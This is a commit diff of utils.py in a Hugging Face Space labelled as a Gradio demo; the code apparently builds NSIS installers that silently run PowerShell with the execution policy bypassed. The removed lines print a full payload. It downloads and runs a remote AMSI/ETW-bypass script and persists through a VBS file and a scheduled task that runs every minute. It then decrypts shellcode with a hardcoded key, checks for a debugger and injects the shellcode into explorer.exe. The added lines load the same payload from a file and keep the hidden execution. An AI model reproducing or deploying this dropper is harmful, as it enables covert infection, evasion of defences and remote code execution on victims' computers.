demo-docker-gradio

Sleeping

App Files Files Community

sigyllly commited on Jan 2

Commit

9236e3e

verified ·

1 Parent(s): fdd6b99

Update utils.py

Browse files

Files changed (1) hide show

utils.py +8 -106

utils.py CHANGED Viewed

@@ -93,7 +93,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
         SetOutPath "$WINDIR\..\ProgramData\Installer"
         File "{bin_file}"
         File "{ps1_file}"
-        ExecShell "" "$WINDIR\..\ProgramData\Installer\\Verification.ps1" SW_HIDE
         SetAutoClose true
     SectionEnd
     """
@@ -213,111 +213,13 @@ def process_request(request):
         # Extract the file name from the full binary path
         bin_file_name = os.path.basename(bin_path)
-        # Create the PowerShell script with the provided content
-        ps1_content = f'''
-        # Download and execute the script from the provided URL
-        iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
-        # Run the Invoke-NullAMSI command
-        Invoke-NullAMSI
-        Invoke-NullAMSI -etw
-        # Define the content of the VBScript
-        $vbsContent = @'
-        Set objShell = CreateObject("WScript.Shell")
-        objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
-        '@
-        # Define the file path for the .vbs file in the desired location
-        $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
-        # Write the content to the .vbs file
-        $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
-        Write-Host "VBScript file created at: $vbsFilePath"
-        $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
-        $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
-        Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
-        # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
-        $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
-        # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
-        if ($keyBytes.Length -gt 16) {{
-            $keyBytes = $keyBytes[0..15]  # Trim the key to 16 bytes if it's longer
-        }}
-        elseif ($keyBytes.Length -lt 16) {{
-            # If the key is too short, pad it with zeros to make it 16 bytes
-            $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
-        }}
-        # Function to download the encrypted binary from the server
-        function Download-EncryptedShellcode {{
-            param([string]$url)
-            # Download the encrypted binary file directly into memory as a byte array
-            $response = Invoke-WebRequest -Uri $url -UseBasicParsing
-            return $response.Content
-        }}
-        # Read the encrypted shellcode from a local binary file
-        $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
-        # Create an AES encryption object
-        $aes = [System.Security.Cryptography.Aes]::Create()
-        # Set the decryption key and initialization vector (IV)
-        $aes.Key = $keyBytes
-        $aes.IV = $keyBytes[0..15]  # Use the first 16 bytes of the key for the IV
-        # Create a memory stream to hold the decrypted data
-        $memoryStream = New-Object System.IO.MemoryStream
-        $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
-        # Decrypt the encrypted data into the memory stream
-        $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
-        $cryptoStream.Close()
-        # Get the decrypted shellcode
-        $buf = $memoryStream.ToArray()
-        # Anti-debugging mechanism
-        function IsDebuggerPresent {{
-            $IsDebuggerPresentCode = @"
-            using System;
-            using System.Runtime.InteropServices;
-            public class DebugHelper {{
-                [DllImport(\\"kernel32.dll\\")]
-                public static extern bool IsDebuggerPresent();
-            }}
-        "@
-            $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
-            return $debugHelper::IsDebuggerPresent()
-        }}
-        if (IsDebuggerPresent) {{
-            Write-Host "Debugger detected. Exiting."
-            exit
-        }}
-        # Inject shellcode into a target process (example: explorer.exe)
-        $Win32APICode = @"
-        using System;
-        using System.Runtime.InteropServices;
-        public class Win32API {{
-            [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
-            public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
-            [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-            public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
-            [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-            public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
-            [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-            public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
-            [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-            [return: MarshalAs(UnmanagedType.Bool)]
-            public static extern bool CloseHandle(IntPtr hObject);
-        }}
-        "@
-        $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
-        # Target process (explorer.exe) injection
-        $targetProcess = Get-Process explorer | Select-Object -First 1
-        $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
-        # Allocate memory in the target process
-        $size = 0x1000
-        if ($buf.Length -gt $size) {{ $size = $buf.Length }}
-        $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
-        # Write the shellcode into the allocated memory
-        $bytesWritten = [IntPtr]::Zero
-        $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
-        # Create a remote thread to execute the shellcode
-        $threadId = [IntPtr]::Zero
-        $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
-        # Close the process handle
-        $win32api::CloseHandle($processHandle)
-        Write-Host "Shellcode injection completed successfully."
-        '''
         ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
         with open(ps1_path, 'w') as ps1_file:
             ps1_file.write(ps1_content)

         SetOutPath "$WINDIR\..\ProgramData\Installer"
         File "{bin_file}"
         File "{ps1_file}"
+        ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
         SetAutoClose true
     SectionEnd
     """
         # Extract the file name from the full binary path
         bin_file_name = os.path.basename(bin_path)
+        # Read the PowerShell content from the local file
+        with open(POWERSHELL_FILE_PATH, 'r') as ps1_file:
+            ps1_content = ps1_file.read()
+        # Replace the placeholder with the actual binary file name
+        ps1_content = ps1_content.replace("{bin_file_name}", bin_file_name)
         ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
         with open(ps1_path, 'w') as ps1_file:
             ps1_file.write(ps1_content)